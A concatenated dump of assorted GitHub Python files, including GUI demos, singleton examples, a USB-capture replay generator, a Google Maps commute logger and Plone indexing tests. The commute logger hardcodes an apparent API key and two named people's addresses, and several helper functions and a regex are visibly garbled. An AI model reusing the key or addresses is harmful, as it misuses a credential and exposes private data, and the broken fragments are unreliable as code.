ptA=Point(50,100)\n cir =Circle(ptA, 20)\n cir.setFill(\"yellow\")\n cir.draw(win)\n for i in range(15):\n time.sleep(.5)\n cir.move(10,-15)\n time.sleep(.5)\n cir.move(10,15)\n","repo_name":"mgould1799/Intro-To-Python","sub_path":"CSCI220/random/movecir.py","file_name":"movecir.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69839393928","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\nimport sys\n\nclass testLink(QDialog):\n def __init__(self):\n super(testLink, self).__init__()\n self.initUI() \n self.button_test.clicked.connect(lambda:self.test())\n\n def initUI(self):\n self.img = QLabel(self)\n self.img.setFixedSize(300,160)\n # qimg = QImage(img,200,100,QImage.Format_RGB888)\n # self.img.setPixmap(QPixmap.fromImage(qimg))\n\n self.onside_cam = QLabel(self)\n self.onside_cam.setFixedSize(100,50)\n self.onside_cam.move(10,10)\n self.onside_cam.setText(\"正面相机\")\n self.onside_cam.setFont(QFont('Times',14))\n\n self.onside_sure = QFrame(self)\n self.onside_sure.setFixedSize(30,30)\n self.onside_sure.move(110,20)\n self.onside_sure.setStyleSheet(\"background-color:green;\")\n\n self.leftside_cam = QLabel(self)\n self.leftside_cam.setFixedSize(100,50)\n self.leftside_cam.move(10,60)\n self.leftside_cam.setText(\"左面相机\")\n self.leftside_cam.setFont(QFont('Times',14))\n\n self.leftside_sure = QFrame(self)\n self.leftside_sure.setFixedSize(30,30)\n self.leftside_sure.move(110,70)\n self.leftside_sure.setStyleSheet(\"background-color:green;\")\n\n self.rightside_cam = QLabel(self)\n self.rightside_cam.setFixedSize(100,50)\n self.rightside_cam.move(150,10)\n self.rightside_cam.setText(\"右面相机\")\n self.rightside_cam.setFont(QFont('Times',14))\n\n self.rightside_sure = QFrame(self)\n self.rightside_sure.setFixedSize(30,30)\n self.rightside_sure.move(250,20)\n self.rightside_sure.setStyleSheet(\"background-color:green;\")\n\n self.plc = QLabel(self)\n self.plc.setFixedSize(100,50)\n self.plc.move(150,60)\n self.plc.setText(\"PLC控制器\")\n self.plc.setFont(QFont('Times',14))\n\n self.plc_sure = QFrame(self)\n self.plc_sure.setFixedSize(30,30)\n self.plc_sure.move(250,70)\n self.plc_sure.setStyleSheet(\"background-color:green;\")\n\n self.button_test = QPushButton(self)\n self.button_test.setText(\"测试连接性\")\n self.button_test.setFont(QFont(\"Times\", 12))\n self.button_test.setFixedSize(100, 30)\n self.button_test.move(110, 120)\n def test(self):\n print(\"111test\")\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n work = showBig()\n work.show()\n # work.showFullScreen()\n sys.exit(app.exec_())\n","repo_name":"ty9071/suzly2","sub_path":"test_link.py","file_name":"test_link.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8769671884","text":"'''\n单例是一种设计模式,应用该模式的类只会生成一个实例。\n\n单例模式保证了在程序的不同位置都可以且仅可以取到同一个对象实例:如果实例不存在,会创建一个实例;如果已存在就会返回这个实例。因为单例是一个类,所以你也可以为其提供相应的操作方法,以便于对这个实例进行管理。\n\n举个例子来说,比如你开发一款游戏软件,游戏中需要有“场景管理器”这样一种东西,用来管理游戏场景的切换、资源载入、网络连接等等任务。这个管理器需要有多种方法和属性,在代码中很多地方会被调用,且被调用的必须是同一个管理器,否则既容易产生冲突,也会浪费资源。这种情况下,单例模式就是一个很好的实现方法。\n'''\n## M1\nimport threading\n\nclass Singleton(object):\n instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls.instance is None:\n cls.instance = super().__new__(cls)\n return cls.instance\n\n\ndef test():\n single = Singleton()\n print(single)\n\n\nfor i in range(5):\n t = threading.Thread(target=test)\n t.start()\n\n\n## M2\nimport threading\n\n\ndef singleton(cls):\n instances = {}\n\n def _singleton(*args, **kwargs):\n if cls not in instances:\n instances[cls] = cls(*args, **kwargs)\n return instances[cls]\n\n return _singleton\n\n\n@singleton\ndef test(a, b):\n return None\n\n\ndef test1():\n print(test)\n\n\nfor i in range(5):\n t = threading.Thread(target=test1)\n t.start()\n\n\n## M3\ndef singleton(cls):\n _instance = {}\n\n def inner():\n if cls not in _instance:\n _instance[cls] = cls()\n return _instance[cls]\n return inner\n \n@singleton\nclass Cls(object):\n def __init__(self):\n pass\n\ncls1 = Cls()\ncls2 = Cls()\nprint(id(cls1) == id(cls2))\n\n\n## M4\nclass Singleton(object):\n def __init__(self, cls):\n self._cls = cls\n self._instance = {}\n def __call__(self):\n if self._cls not in self._instance:\n self._instance[self._cls] = self._cls()\n return self._instance[self._cls]\n\n@Singleton\nclass Cls2(object):\n def __init__(self):\n pass\n\ncls1 = Cls2()\ncls2 = Cls2()\nprint(id(cls1) == id(cls2))\n\nclass Cls3():\n pass\n\nCls3 = Singleton(Cls3)\ncls3 = Cls3()\ncls4 = Cls3()\nprint(id(cls3) == id(cls4))\n","repo_name":"lynn840429/Python_Learning-InterviewPython","sub_path":"code_imp/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44442896971","text":"import feedparser as fp\nfrom textblob import TextBlob as tb\nimport re\n\n# feed from CNN\nworldNews = fp.parse('http://rss.cnn.com/rss/edition_world.rss')\n\n# number of stories\nnumStories = len(worldNews['entries'])\n\n# list to contain polarity of stories\nfinal = []\n\nfor i in range(0,numStories):\n # initial description\n descInit = worldNews['entries'][i]['summary_detail']['value']\n # cleaning out the img tag\n descClean = re.sub('\\ 16:\n ret += '\\n'\n for i in range(len(buff)):\n if i % 16 == 0:\n if i != 0:\n ret += '\" \\\\\\n'\n if len(buff) <= 16:\n ret += 'b\"'\n if not terse or len(buff) > 16:\n ret += '%s\"' % prefix\n\n ret += \"\\\\x%02X\" % (buff[i], )\n return ret + '\"'\n\n\ndef str2hexline(buff):\n if len(buff) == 0:\n return '\"\"'\n buff = bytearray(buff)\n ret = ''\n for i in range(len(buff)):\n ret += \"\\\\x%02X\" % (buff[i], )\n return '\"' + ret + '\"'\n\n\npi = None\nps = None\n\nfout = sys.stdout\n\nprefix = ' ' * 8\nindent = ''\nline_buff = []\n\n\ndef lines_clear():\n del line_buff[:]\n\n\ndef lines_commit():\n for line in line_buff:\n fout.write(line + '\\n')\n del line_buff[:]\n\n\ndef line(s):\n line_buff.append('%s%s' % (indent, s))\n\n\ndef comment(s):\n line(\"# \" + s)\n\n\ndef indentP():\n global indent\n indent += ' '\n\n\ndef indentN():\n global indent\n indent = indent[4:]\n\n\ndumb = False\nomit_ro = True\n\n\ndef emit_ro():\n '''Return true if keeping ro. Otherwise clear line buffer and return false'''\n if omit_ro:\n lines_clear()\n return False\n else:\n return False\n\n\ndef bin2hexarg(data):\n ret = str2hex(data, prefix=prefix)\n if len(data) > 16:\n ret += '\\n%s' % prefix\n return ret\n\n\ndef pkt_strip(p):\n pprefix = ord(p[0])\n '''\n if pprefix != 0x08:\n #raise Exception(\"Bad prefix\")\n line('# WARNING: unexpected prefix')\n '''\n size = (ord(p[-1]) << 8) | ord(p[-2])\n # Exact match\n if size == len(p) - 3:\n return (p[1:-2], False, pprefix)\n # Extra data\n # So far this is always 0 (should verify?)\n elif size < len(p) - 3:\n # TODO: verify 0 padding\n return (p[1:1 + size], True, pprefix)\n # Not supposed to happen\n else:\n print(bin2hexarg(p))\n print(size)\n raise Exception(\"Bad size\")\n\n\nclass CmpFail(Exception):\n pass\n\n\ndef cmp_buff(exp, act):\n if len(exp) != len(act):\n raise CmpFail(\"Exp: %d, act: %d\" % (len(exp), len(act)))\n\n\ndef cmp_mask(exp, mask, act):\n if len(exp) != len(act):\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='actual')\n raise CmpFail(\"Exp: %d, act: %d\" % (len(exp), len(act)))\n if len(exp) != len(mask):\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='mask')\n raise CmpFail(\"Exp: %d, mask: %d\" % (len(exp), len(mask)))\n for expc, actc in zip(exp, act):\n if mask == '\\xFF' and expc != actc:\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='actual')\n raise CmpFail(\"Exp: 0x%02X, act: 0x%02X\" % (ord(exp), ord(actc)))\n\n\ndef peekp():\n return nextp()[1]\n\n\nclass OutOfPackets(Exception):\n pass\n\n\ndef nextp():\n ppi = pi + 1\n while True:\n if ppi >= len(ps):\n raise OutOfPackets(\"Out of packets, started packet %d, at %d\" %\n (pi, ppi))\n p = ps[ppi]\n if p['type'] != 'comment':\n return ppi, p\n ppi = ppi + 1\n\n\ndef next_bulk1(cmd):\n global pi\n\n pi, pw = nextp()\n assert pw['type'] == 'bulkWrite', pw['type']\n assert pw['endp'] == 0x01\n assert binascii.unhexlify(pw['data']) == cmd\n\n pi, pr = nextp()\n assert pr['type'] == 'bulkRead'\n assert pr['endp'] == 0x83\n return binascii.unhexlify(pr['data'])\n\n\ndef pack32ub(n):\n return struct.pack('>I', n)\n\n\ndef pack32ul(n):\n return struct.pack('H', n)\n\n\ndef pack16ul(n):\n return struct.pack('I', buff)[0]\n\n\ndef unpack32ul(buff):\n return struct.unpack('H', buff)[0]\n\n\ndef unpack16ul(buff):\n return struct.unpack('II\", pwdata[0:8])\n payload = pwdata[8:]\n assert len(payload) == length\n\n if opcode == 0x0F:\n assert len(payload) == 0\n line(\"abort_stream(dev)\")\n return\n\n pi_next, pr = nextp()\n assert pr['type'] == 'bulkRead'\n if pr['endp'] != 0x83:\n comment(\"WARNING: unexpected read endpoint\")\n basic_write()\n return\n pi = pi_next\n\n prdata = binascii.unhexlify(pr['data'])\n\n # opcode 0 is known, but its boring\n if opcode == 1:\n assert length == 0\n # line(\"response = %s\" % str2hex(prdata, prefix=\" \"))\n vendor, model, ver, sn = ham.parse_info1(prdata)\n comment(\"%s, %s, %s, %s\" % (vendor, model, ver, sn))\n line(\"vendor, model, ver, sn = get_info1(dev)\")\n elif opcode == 2:\n assert length == 0\n width, height = ham.parse_info2(prdata)\n comment(\"0x%04X, 0x%04X\" % (width, height))\n line(\"width, height = get_info2(dev)\")\n elif opcode == 4:\n assert length == 0\n width, height = struct.unpack('>II', prdata)\n comment(\"0x%04X, 0x%04X\" % (width, height))\n line(\"width, height = get_roi_wh(dev)\")\n elif opcode == 9:\n assert prdata == b\"\\x01\"\n prefix = \"\\x00\\x01\\x00\\x00\\x00\\x00\"\n width, height = struct.unpack(\">HH\", payload[len(prefix):])\n line(\"set_roi_wh(dev, 0x%04X, 0x%04X)\" % (width, height))\n elif opcode == 0x2D:\n assert prdata == b\"\\x00\"\n op = struct.unpack(\">H\", payload)[0]\n if op == 1:\n line(\"trig_int(dev)\")\n elif op == 5:\n line(\"trig_sync(dev)\")\n else:\n line(\"trig_n(dev, %u)\" % op)\n elif opcode == 0x1F:\n exp = unpack32ub(prdata)\n comment(\"%u ms\" % exp)\n line(\"exposure = get_exp(dev)\")\n elif opcode == 0x20:\n assert prdata == b\"\\x01\"\n exp = unpack32ub(payload)\n line(\"set_exp(dev, %u)\" % exp)\n # XXX: there is a verify after this we should ideally eat\n elif opcode == 0x0E:\n assert payload == b\"\\x01\"\n assert prdata == b\"\\x01\"\n line(\"force_trig(dev)\")\n else:\n pktl, pkth = pw['packn']\n assert_msg = '\"packet %s/%s\"' % (pktl, pkth)\n response = bin2hexarg(prdata)\n\n # line('validate_read(%s, bulk1(dev, %s), %s)' % (response, out, desc))\n payload_arg = \"\"\n if len(payload):\n out = bin2hexarg(payload)\n payload_arg = \", payload=%s\" % out\n line(\"validate_cmd1(dev, 0x%02X, %s, msg=%s%s)\" %\n (opcode, response, assert_msg, payload_arg))\n\n\ndef dump(fin, source_str, save=False):\n global pi\n global ps\n\n comment(\"Generated from %s\" % source_str)\n j = json.load(open(fin))\n pi = 0\n ps = j['data']\n ps = list(filter(lambda p: p['type'] != 'comment', ps))\n\n def eat_packet(type=None, req=None, val=None, ind=None, length=None):\n p = ps[pi + 1]\n\n if type and type != p['type']:\n raise Exception()\n if req and type != p['req']:\n raise Exception()\n if val and type != p['val']:\n raise Exception()\n if ind and type != p['ind']:\n raise Exception()\n if length and length != p['len']:\n raise Exception()\n\n return pi + 1\n\n im_bytes = None\n while pi < len(ps):\n is_comment = False\n p = ps[pi]\n if p['type'] == 'comment':\n line('# %s' % p['v'])\n is_comment = True\n elif p['type'] == 'bulkWrite':\n bulk_write(p)\n elif p['type'] == 'bulkRead':\n # print(\"# WARNING: dropping bulkRead\")\n endpoint = p['endp']\n if p[\"data\"] is None:\n buff = None\n else:\n buff = binascii.unhexlify(p[\"data\"])\n assert endpoint == 0x82\n sync_word = ham.is_sync(buff, verbose=False)\n sync_str = \"NONE\"\n if sync_word:\n if sync_word == ham.MSG_BEGIN:\n im_bytes = 0\n elif sync_word == ham.MSG_END:\n comment(\"Final bytes: %u\" % im_bytes)\n comment(\"MSG_END: %s\" % binascii.hexlify(buff))\n im_bytes = None\n sync_str = ham.sync2str(sync_word)\n elif im_bytes is None:\n comment(\"WARNING: data without image\")\n im_bytes = len(buff)\n else:\n im_bytes += len(buff)\n comment(\n \"bulkRead(0x%02X): req %u, got %u bytes w/ sync %s, %s bytes total\"\n % (endpoint, p['len'], len(buff), sync_str, im_bytes))\n else:\n raise Exception(\"%u unknown type: %s\" % (pi, p['type']))\n if not is_comment:\n lines_commit()\n pi += 1\n\n lines_commit()\n indentN()\n lines_commit()\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--dumb', action='store_true')\n add_bool_arg(parser,\n '--omit-ro',\n default=True,\n help='Omit read only requests (ex: get SM info)')\n parser.add_argument('--big-thresh', type=int, default=255)\n parser.add_argument('--usbrply', default='')\n parser.add_argument('-w', action='store_true', help='Write python file')\n parser.add_argument('fin')\n args = parser.parse_args()\n\n source_str = args.fin\n if args.fin.find('.cap') >= 0 or args.fin.find(\n '.pcapng') >= 0 or args.fin.find('.pcap') >= 0:\n fin = '/tmp/scrape.json'\n cmd = 'usbrply --no-packet-numbers --no-setup --device-hi %s -j %s >%s' % (\n args.usbrply, args.fin, fin)\n try:\n subprocess.check_call(cmd, shell=True)\n except:\n print(\"Failed to process %s\" % args.fin)\n raise\n else:\n fin = args.fin\n\n if args.w:\n filename, file_extension = os.path.splitext(args.fin)\n fnout = filename + '.py'\n print('Selected output file %s' % fnout)\n assert fnout != fin, fin\n fout = open(fnout, 'w')\n\n dumb = args.dumb\n omit_ro = args.omit_ro\n dump(fin, source_str)\n","repo_name":"JohnDMcMaster/faxitron","sub_path":"usbrply.py","file_name":"usbrply.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"8609775408","text":"import schedule\nimport time\nimport datetime\nimport threading\nimport os\nfrom googlemaps import Client\nfrom time import gmtime, strftime\n\ndef partial(func, *args, **kwargs):\n\tdef f(*args_rest, **kwargs_rest):\n\t\tkw = kwargs.copy()\n\t\tkw.update(kwargs_rest)\n\t\treturn func(*(args + args_rest), **kw) \n\treturn f\n\ndef format_time(hours, minutes):\n\treturn str(hours)+\":\"+str(minutes)+\"0\"\n\ndef find_traffic(hours, minutes):\n\taddresses = []\n\tgmaps = Client('AIzaSyCaQlauoQ1njrABzhVCliY49DaByZNYkTY')\n\tcassie_work = '3237 S 16th St, Milwaukee, WI 53215'\n\tjoey_work = '1550 Innovation Way, Hartford, WI 53027'\n\twith open('address.txt') as f:\n\t\taddresses = f.readlines()\n\tfile = open('times.csv', 'a')\n\tday = datetime.datetime.today().weekday()\n\tfor addr_newline in addresses:\n\t\taddr = addr_newline.rstrip()\n\t\tdirections_cassie = None\n\t\tdirections_joey = None\n\t\tif(hours < 8):\n\t\t\tdirections_cassie = gmaps.directions(addr, cassie_work)\n\t\t\tdirections_joey = gmaps.directions(addr, joey_work)\n\t\telse:\n\t\t\tdirections_cassie = gmaps.directions(cassie_work, addr)\n\t\t\tdirections_joey = gmaps.directions(joey_work, addr)\n\t\tfile.write(str(addr)+','+format_time(hours,minutes)+',Cassie,'+str(directions_cassie[0]['legs'][0]['duration']['value'])+',Joey,'+str(directions_joey[0]['legs'][0]['duration']['value'])+','+str(day)+'\\n')\n\tfile.close()\n\ndef run_threaded(job_func):\n\tjob_thread = threading.Thread(target=job_func)\n\tjob_thread.start()\n\ndef test_job():\n\tprint(\"TEST TEST TEST\")\n\n# def upload_file():\n# \ttimes = []\n# \twith open('times.csv') as f:\n# \t\ttimes = f.readlines()\n# \tfor time in times:\n# \t\ttime = time.rstrip()\n# \t\ttime = time.split(',')\n# \t\tdata = {'address':time[0]+time[1]+time[2], 'time':time[3], 'Cassie':time[5], 'Joey':time[7]}\n# \t\tr = requests.post('localhost:8000', data=data)\n\ndef schedule_tasks():\n\thours = 5\n\tminutes = 0\n\tfor y in range(0,6):\n\t\tfor x in range(0,6):\n\t\t\tp = partial(find_traffic, hours, minutes)\n\t\t\tschedule.every().day.at(format_time(hours, minutes)).do(p)\n\t\t\tminutes += 1\n\t\tminutes = 0\n\t\tif(y == 2):\n\t\t\thours += 7\n\t\telse:\n\t\t\thours += 1\n\t#schedule.every().day.at('9:00').do(upload_file())\n\t#schedule.every().day.at('18:00').do(upload_file())\n\ndef schedule_tasks_test():\n\thours = 18\n\tminutes = 0\n\tfor y in range(0,2):\n\t\tfor x in range(0,1):\n\t\t\tp = partial(find_traffic, hours, minutes)\n\t\t\tschedule.every().day.at(format_time(hours, minutes)).do(p)\n\t\t\tminutes += 1\n\t\tminutes = 0\n\t\thours += 1\n\t#schedule.every().day.at('22:03').do(run_threaded,test_job)\n\n#schedule_tasks()\nprint(os.getpid())\nschedule_tasks_test()\n#find_traffic(5, 69)\n#upload_file()\nwhile True:\n\tschedule.run_pending()\n\ttime.sleep(30)\n","repo_name":"buichlj/traffictracker","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35856809616","text":"# -*- coding: utf-8\nfrom unittest import defaultTestLoader\n\n# test-specific imports go here...\nfrom zope.component import queryUtility, getUtilitiesFor, provideUtility, getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom Products.CMFCore.utils import getToolByName\nfrom collective.indexing.interfaces import IIndexQueueProcessor\nfrom Products.zerocms.interfaces import IZeroCMSIndexQueueProcessor, IRequestFactory, IZeroCMSSettings\n\nfrom mockito import *\nfrom transaction import commit\nfrom socket import error, timeout\nfrom time import sleep\n\nfrom layer import ZeroCMSTestCase\n\nfrom Products.zerocms.mapper import DataMapper, requiredAttributes \nfrom Products.zerocms.indexer import RequestFactory\nclass Bunch:\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\nclass RequestFactoryTests(ZeroCMSTestCase):\n\n def afterSetUp(self):\n registry = getUtility(IRegistry)\n settings = registry.forInterface(IZeroCMSSettings, check=False)\n settings.post_url = u\"http://api/add\"\n def makeRequest(self):\n return mock()\n\n def test_save(self):\n factory = RequestFactory()\n request = mock()\n requestResponse = Bunch(status_code = 200, content=\"testContent\") \n when(request).post(any(), any()).thenReturn(requestResponse)\n factory.getRequests = lambda: request\n factory.save({'id' : 22})\n# verifyZeroInteractions(request)\n\n verify(request).post(u\"http://api/add\", '{\"id\": 22}')\n\n def test_delete(self):\n factory = RequestFactory()\n request = mock()\n requestResponse = Bunch(status_code = 200, content=\"testContent\") \n when(request).delete(any()).thenReturn(requestResponse)\n factory.getRequests = lambda: request\n\n factory.delete({'id' : 22})\n self.assertEqual(u\"http://api/22\", factory.delete_url)\n verify(request).delete(u\"http://api/22\")\n\nclass IndexingTests(ZeroCMSTestCase):\n\n def save(self, data):\n #print \"save(): data recived: \" + repr(data)\n self.savedData = data\n\n def afterSetUp(self):\n self.savedData = None\n self.folder.unmarkCreationFlag() # stop LinguaPlone from renaming\n self.factory = queryUtility(IRequestFactory)\n if self.factory is None:\n raise Exception(\"No factory created\")\n self.factory.save= self.save\n self.expData = '{\"locallyAllowedTypes\": [], \"description\": \"\", \"language\": \"en\", \"title\": \"Foo\", \"rights\": \"\", \"id\": \"test_user_1_\", \"contributors\": [], \"immediatelyAddableTypes\": [], \"creators\": [], \"constrainTypesMode\": -1, \"subject\": []}'\n\n registry = getUtility(IRegistry)\n self.config = registry.forInterface(IZeroCMSSettings, check=False)\n self.config.instance_id = u\"test_\"\n self.config.instance_url= u\"http://test.com\"\n\n def beforeTearDown(self):\n pass\n\n\n\n def testIndexObjectFails(self):\n def raiseException( val):\n raise Exception(\"no save today\")\n self.factory.save = raiseException\n self.folder.processForm(values={'title': 'Foo'}) # updating sends\n self.assertEquals(self.folder.Title(), 'Foo')\n \n self.assertRaises(Exception, commit)\n\n def testDeleteObject(self):\n self.folder.processForm(values={'url': 'Boo'}) # sends remove and index\n\n\n def testIndexObject(self):\n self.folder.processForm(values={'title': 'Foo'}) # updating sends\n self.assertEquals(self.folder.Title(), 'Foo')\n commit() # indexing happens on commit\n self.assertEqual(self.folder.Title(), 'Foo')\n self.assertTrue(self.savedData is not None)\n # 37 UUID + 5 instance_id\n self.assertEquals(len(self.savedData['id']) ,42,msg=\"ID: %s - len %d\" % (self.savedData['id'], len(self.savedData['id'])))\n self.assertEquals(self.savedData['url'] , \"http://test.com/plone/Members/test_user_1_\")\n\n for item in requiredAttributes:\n self.assertTrue(item in self.savedData, msg=\"Missing %s in saved data\" % item)\n\n self.assertNotEquals(self.savedData['body'], \"\")\n self.assertEquals(self.savedData['type'], \"ATFolder\")\n\n def _test_callIndexing(self):\n indexProcessor = queryUtility(IZeroCMSIndexQueueProcessor, name=\"zerocms\")\n indexProcessor.index(self.folder, attributes = {'url' : 'test'})\n\n self.assertEquals(len(self.savedData['id']) ,36)\n\n def _testNoIndexingWithMethodOverride(self):\n self.setRoles(['Manager'])\n output = []\n connection = self.proc.getConnection()\n responses = [getData('dummy_response.txt')] * 42\n output = fakehttp(connection, *responses)\n self.folder.invokeFactory('Topic', id='coll', title='a collection')\n self.folder.coll.addCriterion('Type', 'ATPortalTypeCriterion')\n self.assertTrue('crit__Type_ATPortalTypeCriterion' not in str(output))\n commit()\n self.assert_(repr(output).find('a collection') > 0,\n '\"title\" data not found')\n self.assert_(repr(output).find('crit') == -1, 'criterion indexed?')\n objs = self.portal.portal_catalog(portal_type='ATPortalTypeCriterion')\n self.assertEqual(list(objs), [])\n self.folder.manage_delObjects('coll')\n\n def _testNoIndexingForNonCatalogAwareContent(self):\n self.setRoles(['Manager'])\n output = []\n ref = self.folder.addReference(self.portal.news, 'referencing')\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertTrue(self.savedData is None)\n\nclass UtilityTests(ZeroCMSTestCase):\n\n def testGenericInterface(self):\n proc = queryUtility(IIndexQueueProcessor, name='zerocms')\n self.failUnless(proc, 'utility not found')\n self.failUnless(IIndexQueueProcessor.providedBy(proc))\n self.failUnless(IZeroCMSIndexQueueProcessor.providedBy(proc))\n\n def testGetRequestFactory(self):\n proc = queryUtility(IRequestFactory)\n self.failUnless(proc, 'request factory utility not found')\n\n def testSolrInterface(self):\n proc = queryUtility(IZeroCMSIndexQueueProcessor, name='zerocms')\n self.failUnless(proc, 'utility not found')\n self.failUnless(IIndexQueueProcessor.providedBy(proc))\n self.failUnless(IZeroCMSIndexQueueProcessor.providedBy(proc))\n\n def testRegisteredProcessors(self):\n procs = list(getUtilitiesFor(IIndexQueueProcessor))\n self.failUnless(procs, 'no utilities found')\n zerocms = queryUtility(IZeroCMSIndexQueueProcessor, name='zerocms')\n self.failUnless(zerocms in [util for name, util in procs],\n 'zerocms utility not found')\n\n# def testSearchInterface(self):\n# search = queryUtility(ISearch)\n# self.failUnless(search, 'search utility not found')\n# self.failUnless(ISearch.providedBy(search))\n\n\ndef test_suite():\n return defaultTestLoader.loadTestsFromName(__name__)\n #return defaultTestLoader.loadTestsFromTestCase(UtilityTests)\n","repo_name":"zeronorge/Products.zerocms","sub_path":"Products/zerocms/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21717561673","text":"from logistic_reg import *\n\ndef testDataLoad():\n print(\"Running \" + testDataLoad.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n print(X.shape)\n\ndef testNormalization():\n print(\"Running \" + testNormalization.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n X_norm = dataNorm(X)\n testNorm([X_norm])\n\ndef testErrorCompute():\n print(\"Running \" + testErrorCompute.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n X_norm = dataNorm(X)\n J = errCompute(X_norm, np.zeros((X_norm.shape[1] - 1, 1)))\n print(J)\n\ndef testSGD():\n print(\"Running \" + testSGD.__name__)\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n\ndef testSGDPredict():\n print(\"Running \" + testSGDPredict.__name__)\n print(\"Train set : a4shuffled.data\")\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n\n print(\"Test set : a4shuffled.data\")\n y_predict = Predict(X_shufnorm, theta)\n\n test_predict = []\n count = 0\n\n dataFile = open(\"a4predict.data\", \"r\")\n lines = dataFile.readlines()\n\n for line in lines:\n words = line.split(\",\")\n for word in words:\n test_predict.append(int(word))\n \n hit = 0\n for i in range(len(test_predict)):\n if test_predict[i] == y_predict[i]:\n hit += 1\n accuracy = hit / len(test_predict) * 100.0\n print(\"Accuracy : {}\".format(accuracy))\n\ndef testSGDPredict2():\n print(\"Running \" + testSGDPredict2.__name__)\n print(\"Train set : a4shuffled.data\")\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n \n X_test = dataLoad(\"data_banknote_authentication.txt\")\n X_testnorm = dataNorm(X_test)\n\n print(\"Test set : data_banknote_authentication.txt\")\n y_predict = Predict(X_testnorm, theta)\n\n hit = 0\n for i in range(X_testnorm.shape[0]):\n if X_testnorm[i][-1] == y_predict[i]:\n hit += 1\n accuracy = hit / X_testnorm.shape[0] * 100.0\n print(\"Accuracy : {}\".format(accuracy))\n\ntestDataLoad()\ntestNormalization()\ntestErrorCompute()\ntestSGD()\ntestSGDPredict()\ntestSGDPredict2()","repo_name":"wenlin-koh/Logistic-Regression-Classifier---python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32198557562","text":"import sys\nfrom pathlib import Path\n\nimport cloudpickle\n\n\ndef main(uid, input_file):\n func_path = Path.cwd() / f'{uid}.func'\n with func_path.open(mode = 'rb') as f:\n func = cloudpickle.load(f)\n\n input_file_path = Path.cwd() / Path(input_file).name\n output_file_path = Path.cwd() / f'{uid}.output'\n\n func(input_file_path, output_file_path)\n\n\nif __name__ == '__main__':\n main(uid = sys.argv[1], input_file = sys.argv[2])\n","repo_name":"JoshKarpel/htcondor-job","sub_path":"htcondor_job/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32073636652","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 17 00:58:53 2018\r\n\r\n@author: Lior Reznik\r\n\"\"\"\r\n\r\nfrom Tkinter import *\r\nimport tkFileDialog\r\nimport tkMessageBox \r\n\r\n\r\nclass View:\r\n def __init__(self, main,controller):\r\n self.controller=controller\r\n self.main=main\r\n self.__build\r\n\r\n @property \r\n def __build(self):\r\n \"\"\"function that builds the gui\"\"\"\r\n self.prevmsg=\"\"\r\n self.main.geometry(\"750x450+950+187\")\r\n self.main.title(\"Naive Bayes Classifier\")\r\n self.main.configure(background=\"#ffffff\")\r\n self.Browse_Button = Button(self.main,background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Browse_Button.place(relx=0.81, rely=0.24, height=34, width=130)\r\n self.Browse_Button.configure(text=\"Browse\",command=self.__findpath)\r\n\r\n self.Build_Button = Button(self.main,state='disabled',background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Build_Button.place(relx=0.23, rely=0.49, height=34, width=247)\r\n self.Build_Button.configure(text=\"Build\",command=self.controller.builder)\r\n \r\n\r\n self.Browse_Entry = Entry(self.main,state='readonly',background=\"white\",font=\"TkFixedFont\",insertbackground=\"black\",readonlybackground=\"white\",width=254,text='Click on Browse to select the folder path',)\r\n self.Browse_Entry.place(relx=0.26, rely=0.24,height=30, relwidth=0.54)\r\n \r\n \r\n self.Classify_Button=Button(self.main,state='disabled',background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Classify_Button.place(relx=0.23, 